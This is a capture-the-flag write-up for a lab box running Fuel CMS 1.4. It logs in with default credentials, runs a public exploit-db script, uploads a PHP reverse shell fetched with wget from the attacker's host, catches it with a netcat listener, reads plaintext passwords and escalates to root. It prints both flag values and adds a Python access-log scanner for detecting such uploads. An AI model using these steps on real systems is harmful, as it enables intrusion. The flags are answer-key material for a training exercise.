A new start-up has a few issues with their web server.
Root the box! Designed and created by DarkStar7471, built by Paradox.
You know the drill - enumeration:
![](https://static.wixstatic.com/media/b4353b_2494ee1be0f64529835649b013f4d24b~mv2.png/v1/fill/w_73,h_51,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_2494ee1be0f64529835649b013f4d24b~mv2.png)
Ok. Only a website here, running on Apache 2.4.18 on an Ubuntu box. Let's hit the site. Looks like it's a CMS called Fuel 1.4 which hasn't been set up yet. It talks about a GitHub download so there should be some documentation. There's even a link there for the admin portal /fuel and the default credentials are supplied.
Wow. It let us in. We can even change the password - lol. Let's change it later... but in real life, I'd change that thing for persistence.
![](https://static.wixstatic.com/media/b4353b_0a9be75b93214cb095a08348b3ac45e7~mv2.png/v1/fill/w_48,h_22,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_0a9be75b93214cb095a08348b3ac45e7~mv2.png)
It looks like I can create pages, so let's do that. Trying the pentestmonkey php reverse shell gives us an error about the server setup to upload files this size. Let's dig into settings.
![](https://static.wixstatic.com/media/b4353b_d42d13f864dd4da19bda5c2532a2d727~mv2.png/v1/fill/w_48,h_13,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_d42d13f864dd4da19bda5c2532a2d727~mv2.png)
Actually, there's a known bug in this, here: https://www.exploit-db.com/exploits/50477 It's a Python script, so let's go.
![](https://static.wixstatic.com/media/b4353b_8e21ee260fda41f58783908f8b106001~mv2.png/v1/fill/w_73,h_29,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_8e21ee260fda41f58783908f8b106001~mv2.png)
Ok... seemed easy enough. Can't do much here, so we'll have to try and find a way to get us a better shell. First things first, let's:

1. Grab the pentestmonkey reverse shell PHP script and edit it so it points back to our IP.
2. Start a netcat listener (nc -lvnp 1234).
3. Start a Python HTTP server to host our PHP reverse shell (python3 -m http.server).
4. Upload that new PHP script to the server, using the shell our exploit script gave us (wget http://[yourIP]:8000/shell.php).
5. Visit the page we uploaded, and this should pop us a shell as the web server.
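
From the defender's side, that last step leaves a trace in the access log: a PHP file other than the CMS front controller answering with a 2xx status. The following is an added example, not part of the original write-up, that flags such requests in Apache combined-format logs; the `/index.php` allowlist and the sample log lines are constructed assumptions.

```python
import re

# Assumption: the CMS serves every page through a single front controller,
# so any other .php file that answers successfully deserves a look.
ALLOWED_PHP = {"/index.php"}

# Apache "combined" format: host ident user [time] "request" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Script part of a URL path, including PATH_INFO style (/index.php/fuel/login)
SCRIPT_RE = re.compile(r'(.*?\.php)(?:/|$)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges), not taken from the box.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php/fuel/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /assets/css/main.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2023:14:01:11 +0000] "GET /shell.php HTTP/1.1" 200 0 "-" "curl/8.0"',
    '198.51.100.23 - - [10/Oct/2023:14:01:40 +0000] "GET /missing.php HTTP/1.1" 404 280 "-" "curl/8.0"',
    'garbage line that is not an access log entry',
]

def unexpected_php_hits(lines, allowed=ALLOWED_PHP):
    """Return (ip, timestamp, script, status) for each successful direct
    request to a .php file that is not a known entry point."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it instead of crashing
        path = m["target"].split("?", 1)[0]  # drop the query string
        script = SCRIPT_RE.match(path)
        if not script:
            continue  # static asset or non-PHP route
        status = int(m["status"])
        # Only 2xx matters here: the file exists and was served or executed.
        if script.group(1) not in allowed and 200 <= status < 300:
            hits.append((m["ip"], m["ts"], script.group(1), status))
    return hits

if __name__ == "__main__":
    for hit in unexpected_php_hits(SAMPLE_LOG):
        print("unexpected PHP entry point:", hit)
```

Pairing this with a file-integrity check on the web root catches the upload itself, not just the first visit.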
Once we have the shell, we can cd into the user folder and get the first flag.
![](https://static.wixstatic.com/media/b4353b_1a7a0a8a343f4293a04f58a162e4cc9a~mv2.png/v1/fill/w_74,h_17,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_1a7a0a8a343f4293a04f58a162e4cc9a~mv2.png)
User.txt is 6470e394cbf6dab6a91682cc8585059b
I did NOT enumerate properly earlier. I was stuck on this for a bit and ended up reading the writeup a bit where he hinted he found his on the main screen... I try not to read too far into the write up - once it gives me the start of a hint I stop reading and look for myself.
Looking, I saw this database thing. So since I already have a shell, I decided to cat out that file.
![](https://static.wixstatic.com/media/b4353b_76271aab32fa42cfa612d66df89f01f4~mv2.png/v1/fill/w_84,h_67,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_76271aab32fa42cfa612d66df89f01f4~mv2.png)
Looks like we have some plain text passwords here and root is right there. Let's do a su to root and get that flag.
![](https://static.wixstatic.com/media/b4353b_ad31c802f82b4464a0b0f93f75932854~mv2.png/v1/fill/w_73,h_24,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_ad31c802f82b4464a0b0f93f75932854~mv2.png)
Root.txt is b9bbcb33e11b80be759c4e844862482d